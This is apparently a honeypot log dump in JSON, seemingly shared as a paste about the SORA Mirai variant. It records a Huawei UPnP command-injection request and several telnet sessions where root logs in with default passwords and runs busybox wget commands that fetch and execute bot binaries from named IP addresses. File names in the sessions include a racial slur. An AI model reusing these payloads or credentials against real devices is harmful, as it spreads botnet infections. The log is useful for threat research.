SORA trying hadoop bug lol

1. {
2. "datas": [
3. {
4. "@timestamp": "2018-09-30T02:26:31.000Z",
5. "data": "POST /ws/v1/cluster/apps/new-application HTTP/1.1\r\nHost: 127.0.0.1:8080\r\nContent-Length: 0\r\nUser-Agent: python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-754.el6.x86_64\r\nConnection: keep-alive\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\n\r\n"
6. },
7. {
8. "@timestamp": "2018-09-20T23:03:32.000Z",
9. "data": "POST /ctrlt/DeviceUpgrade_1 HTTP/1.1\r\nHost: 127.0.0.1:37215\r\nContent-Length: 478\r\nUser-Agent: python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-754.3.5.el6.x86_64\r\nConnection: keep-alive\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\n\r\n\u003c?xml version=\"1.0\" ?\u003e\n \u003cs:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"\u003e\n \u003cs:Body\u003e\u003cu:Upgrade xmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\"\u003e\n \u003cNewStatusURL\u003e$(busybox wget -g 209.141.34.89 -l /tmp/scarface -r /bins/sora.mips ;chmod +x /tmp/scarface ;/tmp/scarface huawei)\u003c/NewStatusURL\u003e\n\u003cNewDownloadURL\u003e$(echo HUAWEIUPNP)\u003c/NewDownloadURL\u003e\n\u003c/u:Upgrade\u003e\n \u003c/s:Body\u003e\n \u003c/s:Envelope\u003e"
10. },
11. {
12. "@timestamp": "2018-09-20T18:43:03.000Z",
13. "data": "POST /ctrlt/DeviceUpgrade_1 HTTP/1.1\r\nHost: 127.0.0.1:37215\r\nContent-Length: 478\r\nUser-Agent: python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-754.3.5.el6.x86_64\r\nConnection: keep-alive\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\n\r\n\u003c?xml version=\"1.0\" ?\u003e\n \u003cs:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"\u003e\n \u003cs:Body\u003e\u003cu:Upgrade xmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\"\u003e\n \u003cNewStatusURL\u003e$(busybox wget -g 209.141.34.89 -l /tmp/scarface -r /bins/sora.mips ;chmod +x /tmp/scarface ;/tmp/scarface huawei)\u003c/NewStatusURL\u003e\n\u003cNewDownloadURL\u003e$(echo HUAWEIUPNP)\u003c/NewDownloadURL\u003e\n\u003c/u:Upgrade\u003e\n \u003c/s:Body\u003e\n \u003c/s:Envelope\u003e"
14. }
15. ],
16. "inputs": {
17. "04351c08ad6d": [
18. {
19. "@timestamp": "2018-09-15T04:21:19.755Z",
20. "eventid": "command.input",
21. "input": "/bin/busybox rm -rf dropper; \u003eNiGGeR69xd; /bin/busybox SORA"
22. },
23. {
24. "@timestamp": "2018-09-15T04:21:19.663Z",
25. "eventid": "command.input",
26. "input": "./NiGGeR69xd selfrep.x86; /bin/busybox BIGREP"
27. },
28. {
29. "@timestamp": "2018-09-15T04:21:19.301Z",
30. "eventid": "command.input",
31. "input": "/bin/busybox wget http://209.141.42.153:80/bins/sora.x86 -O - \u003e NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
32. },
33. {
34. "@timestamp": "2018-09-15T04:21:19.202Z",
35. "eventid": "command.input",
36. "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA"
37. },
38. {
39. "@timestamp": "2018-09-15T04:21:19.112Z",
40. "eventid": "command.input",
41. "input": "/bin/busybox SORA"
42. },
43. {
44. "@timestamp": "2018-09-15T04:21:19.011Z",
45. "eventid": "command.input",
46. "input": "/bin/busybox cat /bin/busybox || while read i; do echo $i; done \u003c /bin/busybox"
47. },
48. {
49. "@timestamp": "2018-09-15T04:21:18.902Z",
50. "eventid": "command.input",
51. "input": "/bin/busybox cp /bin/busybox NiGGeR69xd; \u003eNiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
52. },
53. {
54. "@timestamp": "2018-09-15T04:21:18.892Z",
55. "eventid": "command.input",
56. "input": "/bin/busybox rm -rf NiGGeR69xd dropper"
57. },
58. {
59. "@timestamp": "2018-09-15T04:21:18.890Z",
60. "eventid": "command.input",
61. "input": "\u003e/usr/.ptmx \u0026\u0026 cd /usr/"
62. },
63. {
64. "@timestamp": "2018-09-15T04:21:18.883Z",
65. "eventid": "command.input",
66. "input": "\u003e/boot/.ptmx \u0026\u0026 cd /boot/"
67. },
68. {
69. "@timestamp": "2018-09-15T04:21:18.881Z",
70. "eventid": "command.input",
71. "input": "\u003e/etc/.ptmx \u0026\u0026 cd /etc/"
72. },
73. {
74. "@timestamp": "2018-09-15T04:21:18.873Z",
75. "eventid": "command.input",
76. "input": "\u003e/bin/.ptmx \u0026\u0026 cd /bin/"
77. },
78. {
79. "@timestamp": "2018-09-15T04:21:18.871Z",
80. "eventid": "command.input",
81. "input": "\u003e/dev/shm/.ptmx \u0026\u0026 cd /dev/shm/"
82. },
83. {
84. "@timestamp": "2018-09-15T04:21:18.863Z",
85. "eventid": "command.input",
86. "input": "\u003e/dev/netslink/.ptmx \u0026\u0026 cd /dev/netslink/"
87. },
88. {
89. "@timestamp": "2018-09-15T04:21:18.861Z",
90. "eventid": "command.input",
91. "input": "\u003e/.ptmx \u0026\u0026 cd /"
92. },
93. {
94. "@timestamp": "2018-09-15T04:21:18.859Z",
95. "eventid": "command.input",
96. "input": "\u003e/var/tmp/.ptmx \u0026\u0026 cd /var/tmp/"
97. },
98. {
99. "@timestamp": "2018-09-15T04:21:18.858Z",
100. "eventid": "command.input",
101. "input": "\u003e/var/run/.ptmx \u0026\u0026 cd /var/run/"
102. },
103. {
104. "@timestamp": "2018-09-15T04:21:18.848Z",
105. "eventid": "command.input",
106. "input": "\u003e/mnt/.ptmx \u0026\u0026 cd /mnt/"
107. },
108. {
109. "@timestamp": "2018-09-15T04:21:18.846Z",
110. "eventid": "command.input",
111. "input": "\u003e/dev/.ptmx \u0026\u0026 cd /dev/"
112. },
113. {
114. "@timestamp": "2018-09-15T04:21:18.845Z",
115. "eventid": "command.input",
116. "input": "\u003e/var/.ptmx \u0026\u0026 cd /var/"
117. },
118. {
119. "@timestamp": "2018-09-15T04:21:18.837Z",
120. "eventid": "command.input",
121. "input": "\u003e/tmp/.ptmx \u0026\u0026 cd /tmp/"
122. },
123. {
124. "@timestamp": "2018-09-15T04:21:18.834Z",
125. "eventid": "command.input",
126. "input": "sh"
127. },
128. {
129. "@timestamp": "2018-09-15T04:21:18.832Z",
130. "eventid": "command.input",
131. "input": "shell"
132. },
133. {
134. "@timestamp": "2018-09-15T04:21:18.829Z",
135. "eventid": "command.input",
136. "input": "system"
137. },
138. {
139. "@timestamp": "2018-09-15T04:21:18.741Z",
140. "eventid": "command.input",
141. "input": "enable"
142. },
143. {
144. "@timestamp": "2018-09-15T04:21:18.652Z",
145. "eventid": "command.input",
146. "input": ""
147. },
148. {
149. "@timestamp": "2018-09-15T04:21:17.039Z",
150. "eventid": "login.success",
151. "geoip": {
152. "city_name": "Las Vegas",
153. "country_name": "United States"
154. },
155. "password": "admin",
156. "username": "root"
157. }
158. ],
159. "11793e449a70": [
160. {
161. "@timestamp": "2018-09-15T04:12:40.539Z",
162. "eventid": "command.input",
163. "input": "/bin/busybox rm -rf dropper; \u003eNiGGeR69xd; /bin/busybox SORA"
164. },
165. {
166. "@timestamp": "2018-09-15T04:12:40.488Z",
167. "eventid": "command.input",
168. "input": "./NiGGeR69xd selfrep.x86; /bin/busybox BIGREP"
169. },
170. {
171. "@timestamp": "2018-09-15T04:12:40.265Z",
172. "eventid": "command.input",
173. "input": "/bin/busybox wget http://209.141.42.153:80/bins/sora.x86 -O - \u003e NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
174. },
175. {
176. "@timestamp": "2018-09-15T04:12:39.639Z",
177. "eventid": "command.input",
178. "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA"
179. },
180. {
181. "@timestamp": "2018-09-15T04:12:39.294Z",
182. "eventid": "command.input",
183. "input": "/bin/busybox SORA"
184. },
185. {
186. "@timestamp": "2018-09-15T04:12:39.238Z",
187. "eventid": "command.input",
188. "input": "/bin/busybox cat /bin/busybox || while read i; do echo $i; done \u003c /bin/busybox"
189. },
190. {
191. "@timestamp": "2018-09-15T04:12:38.409Z",
192. "eventid": "login.success",
193. "geoip": {
194. "city_name": "Las Vegas",
195. "country_name": "United States"
196. },
197. "password": "root",
198. "username": "root"
199. }
200. ],
201. "1fa9946460a3": [
202. {
203. "@timestamp": "2018-09-15T04:14:17.149Z",
204. "eventid": "command.input",
205. "input": "/bin/busybox rm -rf dropper; \u003eNiGGeR69xd; /bin/busybox SORA"
206. },
207. {
208. "@timestamp": "2018-09-15T04:14:17.103Z",
209. "eventid": "command.input",
210. "input": "./NiGGeR69xd selfrep.x86; /bin/busybox BIGREP"
211. },
212. {
213. "@timestamp": "2018-09-15T04:14:16.925Z",
214. "eventid": "command.input",
215. "input": "/bin/busybox wget http://209.141.42.153:80/bins/sora.x86 -O - \u003e NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
216. },
217. {
218. "@timestamp": "2018-09-15T04:14:16.875Z",
219. "eventid": "command.input",
220. "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA"
221. },
222. {
223. "@timestamp": "2018-09-15T04:14:16.829Z",
224. "eventid": "command.input",
225. "input": "/bin/busybox SORA"
226. },
227. {
228. "@timestamp": "2018-09-15T04:14:16.778Z",
229. "eventid": "command.input",
230. "input": "/bin/busybox cat /bin/busybox || while read i; do echo $i; done \u003c /bin/busybox"
231. },
232. {
233. "@timestamp": "2018-09-15T04:14:16.696Z",
234. "eventid": "command.input",
235. "input": "/bin/busybox cp /bin/busybox NiGGeR69xd; \u003eNiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
236. },
237. {
238. "@timestamp": "2018-09-15T04:14:16.691Z",
239. "eventid": "command.input",
240. "input": "/bin/busybox rm -rf NiGGeR69xd dropper"
241. },
242. {
243. "@timestamp": "2018-09-15T04:14:16.689Z",
244. "eventid": "command.input",
245. "input": "\u003e/usr/.ptmx \u0026\u0026 cd /usr/"
246. },
247. {
248. "@timestamp": "2018-09-15T04:14:16.687Z",
249. "eventid": "command.input",
250. "input": "\u003e/boot/.ptmx \u0026\u0026 cd /boot/"
251. },
252. {
253. "@timestamp": "2018-09-15T04:14:16.685Z",
254. "eventid": "command.input",
255. "input": "\u003e/etc/.ptmx \u0026\u0026 cd /etc/"
256. },
257. {
258. "@timestamp": "2018-09-15T04:14:16.683Z",
259. "eventid": "command.input",
260. "input": "\u003e/bin/.ptmx \u0026\u0026 cd /bin/"
261. },
262. {
263. "@timestamp": "2018-09-15T04:14:16.681Z",
264. "eventid": "command.input",
265. "input": "\u003e/dev/shm/.ptmx \u0026\u0026 cd /dev/shm/"
266. },
267. {
268. "@timestamp": "2018-09-15T04:14:16.679Z",
269. "eventid": "command.input",
270. "input": "\u003e/dev/netslink/.ptmx \u0026\u0026 cd /dev/netslink/"
271. },
272. {
273. "@timestamp": "2018-09-15T04:14:16.677Z",
274. "eventid": "command.input",
275. "input": "\u003e/.ptmx \u0026\u0026 cd /"
276. },
277. {
278. "@timestamp": "2018-09-15T04:14:16.675Z",
279. "eventid": "command.input",
280. "input": "\u003e/var/tmp/.ptmx \u0026\u0026 cd /var/tmp/"
281. },
282. {
283. "@timestamp": "2018-09-15T04:14:16.673Z",
284. "eventid": "command.input",
285. "input": "\u003e/var/run/.ptmx \u0026\u0026 cd /var/run/"
286. },
287. {
288. "@timestamp": "2018-09-15T04:14:16.670Z",
289. "eventid": "command.input",
290. "input": "\u003e/mnt/.ptmx \u0026\u0026 cd /mnt/"
291. },
292. {
293. "@timestamp": "2018-09-15T04:14:16.668Z",
294. "eventid": "command.input",
295. "input": "\u003e/dev/.ptmx \u0026\u0026 cd /dev/"
296. },
297. {
298. "@timestamp": "2018-09-15T04:14:16.666Z",
299. "eventid": "command.input",
300. "input": "\u003e/var/.ptmx \u0026\u0026 cd /var/"
301. },
302. {
303. "@timestamp": "2018-09-15T04:14:16.664Z",
304. "eventid": "command.input",
305. "input": "\u003e/tmp/.ptmx \u0026\u0026 cd /tmp/"
306. },
307. {
308. "@timestamp": "2018-09-15T04:14:16.662Z",
309. "eventid": "command.input",
310. "input": "sh"
311. },
312. {
313. "@timestamp": "2018-09-15T04:14:16.659Z",
314. "eventid": "command.input",
315. "input": "shell"
316. },
317. {
318. "@timestamp": "2018-09-15T04:14:16.656Z",
319. "eventid": "command.input",
320. "input": "system"
321. },
322. {
323. "@timestamp": "2018-09-15T04:14:16.614Z",
324. "eventid": "command.input",
325. "input": "enable"
326. },
327. {
328. "@timestamp": "2018-09-15T04:14:16.570Z",
329. "eventid": "command.input",
330. "input": ""
331. },
332. {
333. "@timestamp": "2018-09-15T04:14:16.297Z",
334. "eventid": "login.success",
335. "geoip": {
336. "city_name": "Las Vegas",
337. "country_name": "United States"
338. },
339. "password": "admin",
340. "username": "root"
341. }
342. ],
343. "202447413b56": [
344. {
345. "@timestamp": "2018-09-15T04:12:49.426Z",
346. "eventid": "command.input",
347. "input": "/bin/busybox rm -rf dropper; \u003eNiGGeR69xd; /bin/busybox SORA"
348. },
349. {
350. "@timestamp": "2018-09-15T04:12:49.382Z",
351. "eventid": "command.input",
352. "input": "./NiGGeR69xd selfrep.x86; /bin/busybox BIGREP"
353. },
354. {
355. "@timestamp": "2018-09-15T04:12:49.205Z",
356. "eventid": "command.input",
357. "input": "/bin/busybox wget http://209.141.42.153:80/bins/sora.x86 -O - \u003e NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
358. },
359. {
360. "@timestamp": "2018-09-15T04:12:49.157Z",
361. "eventid": "command.input",
362. "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA"
363. },
364. {
365. "@timestamp": "2018-09-15T04:12:49.113Z",
366. "eventid": "command.input",
367. "input": "/bin/busybox SORA"
368. },
369. {
370. "@timestamp": "2018-09-15T04:12:49.063Z",
371. "eventid": "command.input",
372. "input": "/bin/busybox cat /bin/busybox || while read i; do echo $i; done \u003c /bin/busybox"
373. },
374. {
375. "@timestamp": "2018-09-15T04:12:49.014Z",
376. "eventid": "command.input",
377. "input": "/bin/busybox cp /bin/busybox NiGGeR69xd; \u003eNiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
378. },
379. {
380. "@timestamp": "2018-09-15T04:12:49.011Z",
381. "eventid": "command.input",
382. "input": "/bin/busybox rm -rf NiGGeR69xd dropper"
383. },
384. {
385. "@timestamp": "2018-09-15T04:12:49.009Z",
386. "eventid": "command.input",
387. "input": "\u003e/usr/.ptmx \u0026\u0026 cd /usr/"
388. },
389. {
390. "@timestamp": "2018-09-15T04:12:49.007Z",
391. "eventid": "command.input",
392. "input": "\u003e/boot/.ptmx \u0026\u0026 cd /boot/"
393. },
394. {
395. "@timestamp": "2018-09-15T04:12:49.004Z",
396. "eventid": "command.input",
397. "input": "\u003e/etc/.ptmx \u0026\u0026 cd /etc/"
398. },
399. {
400. "@timestamp": "2018-09-15T04:12:49.002Z",
401. "eventid": "command.input",
402. "input": "\u003e/bin/.ptmx \u0026\u0026 cd /bin/"
403. },
404. {
405. "@timestamp": "2018-09-15T04:12:49.000Z",
406. "eventid": "command.input",
407. "input": "\u003e/dev/shm/.ptmx \u0026\u0026 cd /dev/shm/"
408. },
409. {
410. "@timestamp": "2018-09-15T04:12:48.998Z",
411. "eventid": "command.input",
412. "input": "\u003e/dev/netslink/.ptmx \u0026\u0026 cd /dev/netslink/"
413. },
414. {
415. "@timestamp": "2018-09-15T04:12:48.996Z",
416. "eventid": "command.input",
417. "input": "\u003e/.ptmx \u0026\u0026 cd /"
418. },
419. {
420. "@timestamp": "2018-09-15T04:12:48.994Z",
421. "eventid": "command.input",
422. "input": "\u003e/var/tmp/.ptmx \u0026\u0026 cd /var/tmp/"
423. },
424. {
425. "@timestamp": "2018-09-15T04:12:48.992Z",
426. "eventid": "command.input",
427. "input": "\u003e/var/run/.ptmx \u0026\u0026 cd /var/run/"
428. },
429. {
430. "@timestamp": "2018-09-15T04:12:48.990Z",
431. "eventid": "command.input",
432. "input": "\u003e/mnt/.ptmx \u0026\u0026 cd /mnt/"
433. },
434. {
435. "@timestamp": "2018-09-15T04:12:48.988Z",
436. "eventid": "command.input",
437. "input": "\u003e/dev/.ptmx \u0026\u0026 cd /dev/"
438. },
439. {
440. "@timestamp": "2018-09-15T04:12:48.986Z",
441. "eventid": "command.input",
442. "input": "\u003e/var/.ptmx \u0026\u0026 cd /var/"
443. },
444. {
445. "@timestamp": "2018-09-15T04:12:48.984Z",
446. "eventid": "command.input",
447. "input": "\u003e/tmp/.ptmx \u0026\u0026 cd /tmp/"
448. },
449. {
450. "@timestamp": "2018-09-15T04:12:48.981Z",
451. "eventid": "command.input",
452. "input": "sh"
453. },
454. {
455. "@timestamp": "2018-09-15T04:12:48.979Z",
456. "eventid": "command.input",
457. "input": "shell"
458. },
459. {
460. "@timestamp": "2018-09-15T04:12:48.976Z",
461. "eventid": "command.input",
462. "input": "system"
463. },
464. {
465. "@timestamp": "2018-09-15T04:12:48.935Z",
466. "eventid": "command.input",
467. "input": "enable"
468. },
469. {
470. "@timestamp": "2018-09-15T04:12:48.892Z",
471. "eventid": "command.input",
472. "input": ""
473. },
474. {
475. "@timestamp": "2018-09-15T04:12:48.615Z",
476. "eventid": "login.success",
477. "geoip": {
478. "city_name": "Las Vegas",
479. "country_name": "United States"
480. },
481. "password": "default",
482. "username": "root"
483. }
484. ],
485. "25b69393953d": [
486. {
487. "@timestamp": "2018-09-15T04:17:54.442Z",
488. "eventid": "command.input",
489. "input": "/bin/busybox rm -rf dropper; \u003eNiGGeR69xd; /bin/busybox SORA"
490. },
491. {
492. "@timestamp": "2018-09-15T04:17:54.351Z",
493. "eventid": "command.input",
494. "input": "./NiGGeR69xd selfrep.x86; /bin/busybox BIGREP"
495. },
496. {
497. "@timestamp": "2018-09-15T04:17:53.986Z",
498. "eventid": "command.input",
499. "input": "/bin/busybox wget http://209.141.42.153:80/bins/sora.x86 -O - \u003e NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
500. },
501. {
502. "@timestamp": "2018-09-15T04:17:53.884Z",
503. "eventid": "command.input",
504. "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA"
505. },
506. {
507. "@timestamp": "2018-09-15T04:17:53.740Z",
508. "eventid": "command.input",
509. "input": "/bin/busybox SORA"
510. },
511. {
512. "@timestamp": "2018-09-15T04:17:53.652Z",
513. "eventid": "command.input",
514. "input": "/bin/busybox cat /bin/busybox || while read i; do echo $i; done \u003c /bin/busybox"
515. },
516. {
517. "@timestamp": "2018-09-15T04:17:53.546Z",
518. "eventid": "command.input",
519. "input": "/bin/busybox cp /bin/busybox NiGGeR69xd; \u003eNiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
520. },
521. {
522. "@timestamp": "2018-09-15T04:17:53.538Z",
523. "eventid": "command.input",
524. "input": "/bin/busybox rm -rf NiGGeR69xd dropper"
525. },
526. {
527. "@timestamp": "2018-09-15T04:17:53.536Z",
528. "eventid": "command.input",
529. "input": "\u003e/usr/.ptmx \u0026\u0026 cd /usr/"
530. },
531. {
532. "@timestamp": "2018-09-15T04:17:53.534Z",
533. "eventid": "command.input",
534. "input": "\u003e/boot/.ptmx \u0026\u0026 cd /boot/"
535. },
536. {
537. "@timestamp": "2018-09-15T04:17:53.527Z",
538. "eventid": "command.input",
539. "input": "\u003e/etc/.ptmx \u0026\u0026 cd /etc/"
540. },
541. {
542. "@timestamp": "2018-09-15T04:17:53.526Z",
543. "eventid": "command.input",
544. "input": "\u003e/bin/.ptmx \u0026\u0026 cd /bin/"
545. },
546. {
547. "@timestamp": "2018-09-15T04:17:53.518Z",
548. "eventid": "command.input",
549. "input": "\u003e/dev/shm/.ptmx \u0026\u0026 cd /dev/shm/"
550. },
551. {
552. "@timestamp": "2018-09-15T04:17:53.517Z",
553. "eventid": "command.input",
554. "input": "\u003e/dev/netslink/.ptmx \u0026\u0026 cd /dev/netslink/"
555. },
556. {
557. "@timestamp": "2018-09-15T04:17:53.515Z",
558. "eventid": "command.input",
559. "input": "\u003e/.ptmx \u0026\u0026 cd /"
560. },
561. {
562. "@timestamp": "2018-09-15T04:17:53.508Z",
563. "eventid": "command.input",
564. "input": "\u003e/var/tmp/.ptmx \u0026\u0026 cd /var/tmp/"
565. },
566. {
567. "@timestamp": "2018-09-15T04:17:53.506Z",
568. "eventid": "command.input",
569. "input": "\u003e/var/run/.ptmx \u0026\u0026 cd /var/run/"
570. },
571. {
572. "@timestamp": "2018-09-15T04:17:53.497Z",
573. "eventid": "command.input",
574. "input": "\u003e/mnt/.ptmx \u0026\u0026 cd /mnt/"
575. },
576. {
577. "@timestamp": "2018-09-15T04:17:53.496Z",
578. "eventid": "command.input",
579. "input": "\u003e/dev/.ptmx \u0026\u0026 cd /dev/"
580. },
581. {
582. "@timestamp": "2018-09-15T04:17:53.489Z",
583. "eventid": "command.input",
584. "input": "\u003e/var/.ptmx \u0026\u0026 cd /var/"
585. },
586. {
587. "@timestamp": "2018-09-15T04:17:53.487Z",
588. "eventid": "command.input",
589. "input": "\u003e/tmp/.ptmx \u0026\u0026 cd /tmp/"
590. },
591. {
592. "@timestamp": "2018-09-15T04:17:53.486Z",
593. "eventid": "command.input",
594. "input": "sh"
595. },
596. {
597. "@timestamp": "2018-09-15T04:17:53.478Z",
598. "eventid": "command.input",
599. "input": "shell"
600. },
601. {
602. "@timestamp": "2018-09-15T04:17:53.477Z",
603. "eventid": "command.input",
604. "input": "system"
605. },
606. {
607. "@timestamp": "2018-09-15T04:17:53.475Z",
608. "eventid": "command.input",
609. "input": "enable"
610. },
611. {
612. "@timestamp": "2018-09-15T04:17:52.676Z",
613. "eventid": "command.input",
614. "input": ""
615. },
616. {
617. "@timestamp": "2018-09-15T04:17:51.781Z",
618. "eventid": "login.success",
619. "geoip": {
620. "city_name": "Las Vegas",
621. "country_name": "United States"
622. },
623. "password": "vizxv",
624. "username": "root"
625. }
626. ],
627. "2b113c9c5c08": [
628. {
629. "@timestamp": "2018-09-15T04:12:46.879Z",
630. "eventid": "command.input",
631. "input": "/bin/busybox rm -rf dropper; \u003eNiGGeR69xd; /bin/busybox SORA"
632. },
633. {
634. "@timestamp": "2018-09-15T04:12:46.787Z",
635. "eventid": "command.input",
636. "input": "./NiGGeR69xd selfrep.x86; /bin/busybox BIGREP"
637. },
638. {
639. "@timestamp": "2018-09-15T04:12:46.425Z",
640. "eventid": "command.input",
641. "input": "/bin/busybox wget http://209.141.42.153:80/bins/sora.x86 -O - \u003e NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
642. },
643. {
644. "@timestamp": "2018-09-15T04:12:46.325Z",
645. "eventid": "command.input",
646. "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA"
647. },
648. {
649. "@timestamp": "2018-09-15T04:12:46.173Z",
650. "eventid": "command.input",
651. "input": "/bin/busybox SORA"
652. },
653. {
654. "@timestamp": "2018-09-15T04:12:46.088Z",
655. "eventid": "command.input",
656. "input": "/bin/busybox cat /bin/busybox || while read i; do echo $i; done \u003c /bin/busybox"
657. },
658. {
659. "@timestamp": "2018-09-15T04:12:45.980Z",
660. "eventid": "command.input",
661. "input": "/bin/busybox cp /bin/busybox NiGGeR69xd; \u003eNiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
662. },
663. {
664. "@timestamp": "2018-09-15T04:12:45.977Z",
665. "eventid": "command.input",
666. "input": "/bin/busybox rm -rf NiGGeR69xd dropper"
667. },
668. {
669. "@timestamp": "2018-09-15T04:12:45.969Z",
670. "eventid": "command.input",
671. "input": "\u003e/usr/.ptmx \u0026\u0026 cd /usr/"
672. },
673. {
674. "@timestamp": "2018-09-15T04:12:45.967Z",
675. "eventid": "command.input",
676. "input": "\u003e/boot/.ptmx \u0026\u0026 cd /boot/"
677. },
678. {
679. "@timestamp": "2018-09-15T04:12:45.959Z",
680. "eventid": "command.input",
681. "input": "\u003e/etc/.ptmx \u0026\u0026 cd /etc/"
682. },
683. {
684. "@timestamp": "2018-09-15T04:12:45.958Z",
685. "eventid": "command.input",
686. "input": "\u003e/bin/.ptmx \u0026\u0026 cd /bin/"
687. },
688. {
689. "@timestamp": "2018-09-15T04:12:45.950Z",
690. "eventid": "command.input",
691. "input": "\u003e/dev/shm/.ptmx \u0026\u0026 cd /dev/shm/"
692. },
693. {
694. "@timestamp": "2018-09-15T04:12:45.948Z",
695. "eventid": "command.input",
696. "input": "\u003e/dev/netslink/.ptmx \u0026\u0026 cd /dev/netslink/"
697. },
698. {
699. "@timestamp": "2018-09-15T04:12:45.940Z",
700. "eventid": "command.input",
701. "input": "\u003e/.ptmx \u0026\u0026 cd /"
702. },
703. {
704. "@timestamp": "2018-09-15T04:12:45.939Z",
705. "eventid": "command.input",
706. "input": "\u003e/var/tmp/.ptmx \u0026\u0026 cd /var/tmp/"
707. },
708. {
709. "@timestamp": "2018-09-15T04:12:45.937Z",
710. "eventid": "command.input",
711. "input": "\u003e/var/run/.ptmx \u0026\u0026 cd /var/run/"
712. },
713. {
714. "@timestamp": "2018-09-15T04:12:45.930Z",
715. "eventid": "command.input",
716. "input": "\u003e/mnt/.ptmx \u0026\u0026 cd /mnt/"
717. },
718. {
719. "@timestamp": "2018-09-15T04:12:45.928Z",
720. "eventid": "command.input",
721. "input": "\u003e/dev/.ptmx \u0026\u0026 cd /dev/"
722. },
723. {
724. "@timestamp": "2018-09-15T04:12:45.920Z",
725. "eventid": "command.input",
726. "input": "\u003e/var/.ptmx \u0026\u0026 cd /var/"
727. },
728. {
729. "@timestamp": "2018-09-15T04:12:45.918Z",
730. "eventid": "command.input",
731. "input": "\u003e/tmp/.ptmx \u0026\u0026 cd /tmp/"
732. },
733. {
734. "@timestamp": "2018-09-15T04:12:45.917Z",
735. "eventid": "command.input",
736. "input": "sh"
737. },
738. {
739. "@timestamp": "2018-09-15T04:12:45.909Z",
740. "eventid": "command.input",
741. "input": "shell"
742. },
743. {
744. "@timestamp": "2018-09-15T04:12:45.901Z",
745. "eventid": "command.input",
746. "input": "system"
747. },
748. {
749. "@timestamp": "2018-09-15T04:12:45.899Z",
750. "eventid": "command.input",
751. "input": "enable"
752. },
753. {
754. "@timestamp": "2018-09-15T04:12:45.071Z",
755. "eventid": "command.input",
756. "input": ""
757. },
758. {
759. "@timestamp": "2018-09-15T04:12:43.528Z",
760. "eventid": "login.success",
761. "geoip": {
762. "city_name": "Las Vegas",
763. "country_name": "United States"
764. },
765. "password": "t0talc0ntr0l4!",
766. "username": "root"
767. }
768. ],
769. "335fbc5279c3": [
770. {
771. "@timestamp": "2018-09-15T04:13:04.193Z",
772. "eventid": "command.input",
773. "input": "/bin/busybox rm -rf dropper; \u003eNiGGeR69xd; /bin/busybox SORA"
774. },
775. {
776. "@timestamp": "2018-09-15T04:13:04.148Z",
777. "eventid": "command.input",
778. "input": "./NiGGeR69xd selfrep.x86; /bin/busybox BIGREP"
779. },
780. {
781. "@timestamp": "2018-09-15T04:13:03.965Z",
782. "eventid": "command.input",
783. "input": "/bin/busybox wget http://209.141.42.153:80/bins/sora.x86 -O - \u003e NiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
784. },
785. {
786. "@timestamp": "2018-09-15T04:13:03.478Z",
787. "eventid": "command.input",
788. "input": "/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA"
789. },
790. {
791. "@timestamp": "2018-09-15T04:13:03.388Z",
792. "eventid": "command.input",
793. "input": "/bin/busybox SORA"
794. },
795. {
796. "@timestamp": "2018-09-15T04:13:03.347Z",
797. "eventid": "command.input",
798. "input": "/bin/busybox cat /bin/busybox || while read i; do echo $i; done \u003c /bin/busybox"
799. },
800. {
801. "@timestamp": "2018-09-15T04:13:03.298Z",
802. "eventid": "command.input",
803. "input": "/bin/busybox cp /bin/busybox NiGGeR69xd; \u003eNiGGeR69xd; /bin/busybox chmod 777 NiGGeR69xd; /bin/busybox SORA"
804. },
805. {
806. "@timestamp": "2018-09-15T04:13:03.295Z",
807. "eventid": "command.input",
808. "input": "/bin/busybox rm -rf NiGGeR69xd dropper"
809. },
810. {
811. "@timestamp": "2018-09-15T04:13:03.292Z",
812. "eventid": "command.input",
813. "input": "\u003e/usr/.ptmx \u0026\u0026 cd /usr/"
814. },
815. {
816. "@timestamp": "2018-09-15T04:13:03.290Z",
817. "eventid": "command.input",
818. "input": "\u003e/boot/.ptmx \u0026\u0026 cd /boot/"
819. },
820. {
821. "@timestamp": "2018-09-15T04:13:03.288Z",
822. "eventid": "command.input",
823. "input": "\u003e/etc/.ptmx \u0026\u0026 cd /etc/"
824. },
825. {
826. "@timestamp": "2018-09-15T04:13:03.286Z",
827. "eventid": "command.input",
828. "input": "\u003e/bin/.ptmx \u0026\u0026 cd /bin/"
829. },
830. {
831. "@timestamp": "2018-09-15T04:13:03.284Z",
832. "eventid": "command.input",
833. "input": "\u003e/dev/shm/.ptmx \u0026\u0026 cd /dev/shm/"
834. },
835. {
836. "@timestamp": "2018-09-15T04:13:03.281Z",
